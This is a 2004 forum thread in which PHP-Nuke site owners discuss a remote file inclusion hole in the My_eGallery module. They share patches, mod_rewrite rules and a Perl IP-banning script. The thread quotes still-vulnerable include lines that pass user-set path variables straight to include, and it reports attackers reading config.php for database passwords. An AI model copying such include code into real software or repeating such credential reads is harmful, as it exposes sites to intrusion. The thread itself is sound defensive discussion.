The basepath bug is not the only hole. I found an executable file namd 4000 in my /modules/My_eGallery/public folder today. Tracing back the logs, I found the following:
The execuble lauches some type of daemon. Not sure what it does. If someone at nukecops would like a copy of it and the inject.txt script, msg me and I'll send them to you - maybe you can figure out what they do.
I patched displayCategory.php in My_eGallery to block further hack attempts by modifying the original basepath fix by adding the following:
Top of displayCategory.php:
Code:
$bug = strpos($basepath,"http");
$bug2 = strpos($adminpath,"http");
if ($bug === false AND $bug2 === false) {
End of displayCategory.php:
Code:
else {
echo "Yeah, I don't think so dipshit...";
}
As far as I can tell, by host's firewall blocked outgoing traffic on the as-yet unknown TCP or UDP port the script binds to, so luckily nothing in my database or site appears to have been changed. Anyone using My_eGallery should make this change post-haste.
_________________
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sun Jan 04, 2004 7:47 pm
The basepath bug is not the only hole. I found an executable file namd 4000 in my /modules/My_eGallery/public folder today. Tracing back the logs, I found the following:
The execuble lauches some type of daemon. Not sure what it does. If someone at nukecops would like a copy of it and the inject.txt script, msg me and I'll send them to you - maybe you can figure out what they do.
I patched displayCategory.php in My_eGallery to block further hack attempts by modifying the original basepath fix by adding the following:
Top of displayCategory.php:
Code:
$bug = strpos($basepath,"http");
$bug2 = strpos($adminpath,"http");
if ($bug === false AND $bug2 === false) {
End of displayCategory.php:
Code:
else {
echo "Yeah, I don't think so dipshit...";
}
As far as I can tell, by host's firewall blocked outgoing traffic on the as-yet unknown TCP or UDP port the script binds to, so luckily nothing in my database or site appears to have been changed. Anyone using My_eGallery should make this change post-haste.
_________________
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sun Jan 04, 2004 7:48 pm
The basepath bug is not the only hole. I found an executable file namd 4000 in my /modules/My_eGallery/public folder today. Tracing back the logs, I found the following:
The execuble lauches some type of daemon. Not sure what it does. If someone at nukecops would like a copy of it and the inject.txt script, msg me and I'll send them to you - maybe you can figure out what they do.
I patched displayCategory.php in My_eGallery to block further hack attempts by modifying the original basepath fix by adding the following:
Top of displayCategory.php:
Code:
$bug = strpos($basepath,"http");
$bug2 = strpos($adminpath,"http");
if ($bug === false AND $bug2 === false) {
End of displayCategory.php:
Code:
else {
echo "Yeah, I don't think so dipshit...";
}
My host's firewall blocked outgoing traffic on the as-yet unknown TCP or UDP port the script binds to, so luckily nothing in my database or site appears to have been changed. Anyone using My_eGallery should make this change post-haste.
_________________
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sun Jan 04, 2004 7:59 pm
Err... don't know why four copies of my previous post appear. Moderator, please delete this post and the first three copies of my previous post. Must have been MySQL acting up again
_________________
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sun Jan 04, 2004 11:30 pm
The basepath and adminpath bugs and fixes still aren't 100% effective. If your server supports mod_rewrite, add this to your rewrite rules to be doubly sure you aren't susceptible to these expoits:
The mod_rewrite rules do work for My_eGallery 2.7.9 for PHP-Nuke. They may not work for the postnuke version (can't say - don't use postnuke myself). If anyone wants to confirm the rules work, load this URL and note the address field in your browser after loading it:
The files being called are empty and both are on my servers so no one's system is going to get buggered...
It's also possible that mod_rewrite isn't supported on that person's web server, or he simply didn't configure things correctly (you can't just drop these in a .htaccess file and expect them to work because of divergent system configurations. Other rewrite options may need to be defined such as RewriteEngine and RewriteBase).
I've already implimented the displayCategory.php fix. The suggested mod_rewrite rules above are just a secondary measure of defense against the adminpath and basepath exploits.
_________________
Last edited by hamesh on Fri Jan 16, 2004 12:26 am; edited 1 time in total
di11rod Nuke Soldier
Joined: Jan 14, 2004
Posts: 26
Posted:
Wed Jan 14, 2004 1:32 am
I added the mod_rewrite directives you suggest and when I tested using the URL you've provided, it redirects my browser....
If that's how my attackers got in, then they'll be held off for now.
I checked my list of admins and they had created an author with super-user status. I deleted the account. I have no other user accounts on this phpNuke install other than my own...
I appreciate any other info I people can provide about these breaches.
Appreciatively,
di11rod
Kliber Corporal
Joined: Dec 22, 2003
Posts: 50
Location: Venezuela
Posted:
Fri Jan 30, 2004 1:36 pm
Thanks for these fixes guys! yep, basepath wasnt the only bug, realized that when I got haxored again, and my Host administrators arent too happy with MEG script now; as Joerg said, there are more bugs to fix; Im really interested in the development of a new version of MEG for PHP-Nuke, with all the security fixs aviable included, any help will be really appreciated
If you are interested, please write me to: kliber at petroleobar dot com
thanks in advance..
Kliber.
Nomaed Nuke Soldier
Joined: Sep 24, 2003
Posts: 21
Posted:
Thu Feb 12, 2004 10:43 am
That's one serious bug!
Another example, of people that have no understanding in proper programming and security, who are writing modules
Anyhow, meanwhile, I blocked this with
Code:
<?php
if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly...");
}
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
...
...
Someone killed my apache with this exploit... Bastards.
Also, an advice - remove register_globals from php.ini!
_________________ Nobody Escapes the Plague of Black Metal!
smithysrise Nuke Cadet
Joined: Mar 31, 2004
Posts: 2
Posted:
Wed Mar 31, 2004 3:47 pm
One of my sites got hit today too. What's more concerning is that they did a "cat config.php" and therefore have the database passwords etc.
So beware of additional clean-up that's required as a result of things like this.
In my case it appears to be a friendly hack, if such a thing exists - no real damage done. Its still a pain having to sort it out though.[/list]
Laffer Corporal
Joined: Jun 03, 2003
Posts: 54
Location: France
Posted:
Thu Apr 01, 2004 2:48 am
Quote:
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
REMOVE the $basepath, $adminpath variables and replace them with the relative path from your nuke directory!!!
If not, you will be still vulnerable!!!!!!
smithysrise Nuke Cadet
Joined: Mar 31, 2004
Posts: 2
Posted:
Thu Apr 01, 2004 3:44 am
Interesting - and not quite so innocuous. They also downloaded (or at least attempted to download) a Linux ELF binary - which was infected with Linux.RST.B.
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sat Apr 17, 2004 2:06 am
Been playing around and found a neat little script that can automatically add (ban) IPs to your .htaccess file. I've tailored it to work for the My_eGallery basepath/adminpath exploits.
# Open .htaccess file in r/w append mode, lock it, go to top, read current contents into array.
open(HTACCESS,"+>>$htapath") || die $!;
flock(HTACCESS,2);
seek(HTACCESS,0,0);
@contents = <HTACCESS>;
# Empty .htaccess file, then write new IP ban line and previous contents to it, close to release lock
truncate(HTACCESS,0);
#print HTACCESS ("SetEnvIf Remote_Addr \^$remote_addr\$ getout \n\# $date $remote_agent\n");
print HTACCESS ("SetEnvIf Remote_Addr \^$remote_addr\$ getout \n");
print HTACCESS (@contents);
close(HTACCESS);
# output an error message to this bad visitor
print "Content-type: text/html\n\n<html><body>500 Fatal Error - Access Denied</body></html>\n";
# send an e-mail message alerting sysop
open (MAIL, "|$mailprog");
print MAIL "To: youremail\@yourdomain\.com\n";
print MAIL "From: anotheremail\@yourdomain\.com\n";
print MAIL "Subject: My_eGallery exploit attempt\n";
print MAIL "\nAn attempt to exploit the My_eGallery basepath/adminpath security flaw has been logged and blocked.\n\n";
print MAIL "date: $date \n";
print MAIL "ip: $ENV{'REMOTE_ADDR'} \n";
print MAIL "host: $remote_host \n";
print MAIL "agent: $remote_agent \n";
print MAIL "uri: $ENV{'REQUEST_URI'} \n\n";
close (MAIL);
exit;
And the mod_rewrite rules to add to your global config or .htaccess file to make it work:
Code:
# traps bad spiders/bots/offline browsers
SetEnvIf Request_URI "^(/robots\.txt)$" allowsome
<Files *>
order deny,allow
deny from env=getout
allow from env=allowsome
</Files>
# Auto add My_eGallery exploit attempts to .htaccess block list
Edit the script, paths and name of the script as desired. Recommend adding the rewrite rules above the rest of your rewrite rules (GT, etc.). Don't forget to chmod the script 755 or 700 and chown your Apache user.
Previously, I grepped my logs daily and added IPs from attempted hack attempts and wanted to automate it. This works brilliantly. It opens your .htaccess file and writes SetEnv lines for each IP to block when saves the file back with it's original contents, then emails you with a notice. It works so well I've actually expanded my rewrite rules to call the script for other hack attempts.
I'm working on further modifying this to write to an external RewriteMap file rather than to one's .htaccess file. Could even write IPs to a hosts.deny file with minor modification.
Can't take credit for the script itself (wish I could find the original URL). Will post any progress...
_________________
Chipsmunk Nuke Cadet
Joined: Apr 12, 2004
Posts: 2
Posted:
Mon Aug 30, 2004 7:09 pm
i already use patch in my_egallery but some error
Code:
Warning: main(modules/My_eGallery/fileFunctions.php): failed to open stream: No such file or directory in /home/asamboi/public_html/modules/My_eGallery/public/displayCategory.php on line 5
Warning: main(): Failed opening 'modules/My_eGallery/fileFunctions.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/asamboi/public_html/modules/My_eGallery/public/displayCategory.php on line 5
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
